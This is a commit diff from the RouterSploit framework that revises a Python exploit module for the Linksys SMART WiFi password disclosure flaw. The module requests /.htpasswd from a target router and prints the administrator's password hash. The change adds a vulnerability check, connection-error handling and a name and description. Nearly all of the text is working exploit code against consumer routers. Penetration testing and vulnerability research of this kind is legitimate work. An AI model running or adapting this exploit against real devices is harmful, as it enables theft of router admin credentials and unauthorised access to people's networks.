Fixing Linksys Smartwifi exploit

24a4151d · Marcin Bury · 2357038e · 24a4151d
Commit 24a4151d authored Nov 30, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 16 additions and 7 deletions

smartwifi_password_disclosure.py ...modules/exploits/linksys/smartwifi_password_disclosure.py +16 -7

No files found.
--- a/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
+++ b/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
@@ -7,6 +7,7 @@ from routersploit import (
    http_request,
    print_info,
    print_success,
+    print_error,
 )


@@ -16,12 +17,12 @@ class Exploit(exploits.Exploit):
    If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
    """
    __info__ = {
-        'name': '',
+        'name': 'Linksys SMART WiFi Password Disclosure',
        'authors': [
            'Sijmen Ruwhof',  # vulnerability discovery
            '0BuRner',  # routersploit module
        ],
-        'description': '',
+        'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.',
        'references': [
            'https://www.kb.cert.org/vuls/id/447516',
            'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
@@ -46,16 +47,24 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')

    def run(self):
-        url = "{}:{}/.htpasswd".format(self.target, self.port)
-        response = http_request(method="GET", url=url)
+        if self.check():
+            print_success("Target seems to be vulnerable")

-        print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
-        print_success("Hash found:", response.text)
+            url = "{}:{}/.htpasswd".format(self.target, self.port)
+            response = http_request(method="GET", url=url)
+            if response is None:
+                print_error("Exploit failed - connection error")
+                return
+
+            print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
+            print_success("Hash found:", response.text)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        url = "{}:{}/.htpasswd".format(self.target, self.port)
-        response = http_request(method="HEAD", url=url)
+        response = http_request(method="GET", url=url)

        if response is not None and response.status_code == 200:
            res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)